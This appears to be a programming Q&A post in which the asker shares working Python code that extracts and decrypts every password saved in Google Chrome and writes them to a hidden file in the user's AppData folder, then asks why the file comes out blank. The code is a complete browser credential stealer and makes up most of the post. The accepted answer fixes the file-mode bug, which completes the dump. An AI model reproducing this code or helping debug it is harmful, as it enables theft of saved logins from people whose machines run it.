# Can't write datas to the txt file in python

Tags: python, sql, database, sqlite, google-chrome

I can display datas, but I can't write them on txt file. I don't get any errors.
Function print() works good, but function file.write() works wrong. Check my code:

```
def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass
    except Exception as e:
        # print("Probably saved password from Chrome version older than v80\n")
        # print(str(e))
        return "Chrome < 80"



if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+") 
            file.write("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
            file.close()
            print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")

    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:

        os.remove("Loginvault.db")
    except Exception as e:
        pass
```

In the alldata.txt I get only this without datas:

```
URL: 
User Name: 
Password: 
**************************************************
```

Help me please. Please I need your help people. Please people I need your help immediatelly

Comment: What is in your r array? Is this not holding the data you'd expect?

Comment: Yes it has data and when I print it, it works, but when I try to write data into the txt file, I get nothing. No data

Answer (score 0, accepted):

Opening a file in "w+" mode truncates the file first. Perhaps you meant "a+"? Or perhaps, don't close the file until program is done writing it.